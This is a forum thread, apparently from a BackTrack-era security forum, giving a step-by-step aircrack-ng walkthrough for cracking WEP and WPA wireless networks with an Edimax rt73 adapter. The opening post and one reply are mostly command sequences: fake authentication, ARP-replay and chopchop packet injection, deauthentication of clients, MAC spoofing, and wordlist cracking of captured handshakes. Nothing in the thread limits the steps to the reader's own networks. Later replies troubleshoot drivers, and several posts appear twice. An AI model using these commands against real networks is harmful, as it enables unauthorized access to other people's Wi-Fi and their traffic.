Hello,
I have another thread Discussing some problems we have been experiencing with the Edimax 7318USg (http://forums.remote-exploit.org/showthread.php?t=14720) . Some people are having a hard time getting the card to inject with command line and since this isnt a problem I have had, I thought I would document what works for me here.

There are three things I want to make very clear before I begin.
First- This is just a compressed version of one of Xploits tutorials. I watched his video's like everyone else and made a txt file with the commands that were used because my memory is terrible. If there are any thanx to be had please remember Xploits as well.

Second- I am still very new to Linux and cannot offer much troubleshooting. If this doesn't work for you, I will most likely not know why. This is just what works for me, I'm still learning just like most of you. ;)

3rd - Any commands inside of the <> symbols are variables. In other words its up to you to configure the information as needed. I have color coded the commands below as a reference in an attempt to avoid confusion .
Mac address of the of the AP
Mac address of your card
Channel of the AP
Name it anything you want


Configure card
modprobe -r rt73 (unload driver)

modprobe rt73 (load driver)

ifconfig rausb0 up (interface up)

iwconfig rausb0 rate 1M (Lower card rate to 1MB)Wep
airodump-ng rausb0 (Scans SSID's)

airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)

aireplay-ng -1 0 -a <mac> -h <yourmac> rausb0 (authenticate)

aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)

aircrack-ng -n 128 <output>*.cap (crack wep)WPA
airodump-ng rausb0 (Scans SSID's)

airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)

aireplay-ng -0 1 -a <mac> -c <yourmac> rausb0 (De Auth)

aircrack-ng -w password.lst <output>*.capHope this helps, good luck.

Nice compact tutorial that can be used as reference by people new to the aircrack-ng suite. However the command in airodump-ng to be used to specify the SSID is -e and not -w (write) which you can label as you like as it only determines the prefix of the cap file. I understand that this is most likely what you mean, but as you write that the SSID should come after the -w option it can be confusing for people not familiar with the program.

Also you should probably write out that after the --bssid comes the is the AP's MAC and not the MAC address of your wireless card. And it would be a good idea to change the aircrack-ng command from <ssid>-01.cap to <ssid>*.cap so that all appropriate cap files will be used in case there are several.

Nice compact tutorial that can be used as reference by people new to the aircrack-ng suite. However the command in airodump-ng to be used to specify the SSID is -e and not -w (write) which you can label as you like as it only determines the prefix of the cap file. I understand that this is most likely what you mean, but as you write that the SSID should come after the -w option it can be confusing for people not familiar with the program.

Also you should probably write out that after the --bssid comes the is the AP's MAC and not the MAC address of your wireless card. And it would be a good idea to change the aircrack-ng command from <ssid>-01.cap to <ssid>*.cap so that all appropriate cap files will be used in case there are several.

Thank you very much. Your right I wasn't thinking that alot if these are my own personal notes and some of them may need explaining. Its definitely something to remember for future how to's and I will fix it now. :D

Thank you very much. Your right I wasn't thinking that alot if these are my own personal notes and some of them may need explaining. Its definitely something to remember for future how to's and I will fix it now. :D

Looks much clearer now and I am sure that you will receive less questions about the commands in their new form.

Just the wild-card missing from <output>.cap now ;)
<output>*.cap

Good tutorial. You might want to add that for WPA to be cracked the password must be in the password.lst. I never had the -3 attack (ARP request replay attack) work for me. I always ended up doing a -4 attack (KoreK chopchop attack):
Mac address of the of the AP
Channel of the AP
Name it anything you want

# airmon-ng stop rausb0
# ifconfig rausb0 down
# macchanger --mac 00:11:22:33:44:55 rausb0
# airmon-ng start rausb0
# airodump-ng rausb0
find the bssid and ctrl-c out
# airodump-ng -c <channel> -w <output> --bssid <mac> rausb0
open a second xterm
# aireplay-ng -1 0 -a <mac> -h 00:11:22:33:44:55 rausb0 or
# aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a <mac> -h 00:11:22:33:44:55 rausb0
and it should successfully associate. Use only one of the two above commands. Sometimes one won't work.
# aireplay-ng -4 -b <mac> -h 00:11:22:33:44:55 rausb0
answer yes and wait
# packetforge-ng --arp -a <mac> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y <output>.xor -w arprequest
# aireplay-ng -2 -r arprequest rausb0
say yes
switch to first xterm and watch data climb
open third xterm and
# aircrack-ng <output>*.cap

Good tutorial. You might want to add that for WPA to be cracked the password must be in the password.lst. I never had the -3 attack (ARP request replay attack) work for me. I always ended up doing a -4 attack (KoreK chopchop attack)

The ARP-replay attack is the most basic of the available ones and will work with every AP and card that supports injection. Only thing one must make sure is that there is some actual traffic going on between the AP and an additional client. If there are no clients currently connected to the AP no ARP requests will be sent and therefore naturally neither intercepted by aireplay-ng.

im having a little problem



ifconfig rausb0 down

modprobe -r rt73
lzm2dir kernel.lzm
modprobe rt73

ifconfig rausb0 up

all works great up to here then
after changing my mac adreass like this

# airmon-ng stop rausb0
# ifconfig rausb0 down
# macchanger --mac 00:11:22:33:44:55 rausb0
# airmon-ng start rausb0
# airodump-ng rausb0

i open kismit or Wireless assiant

and it doesent show any wifis :( how come?

and its strange coz it doesent pick any up after i change my macadreass
so does anyone know why

From what you have posted, your lzm2dir command is missing a /

Try using
lzm2dir kernel.lzm /
and dont forget to inlude the space before the /

Also have you gotten the kernel.lzm and the latest or previous rt73 driver? These do not come with the cd and need to be downloaded. If you just used the lzm2dir kernel.lzm command (with or without the /) without having the kernel.lzm then it would have no effect. Good luck.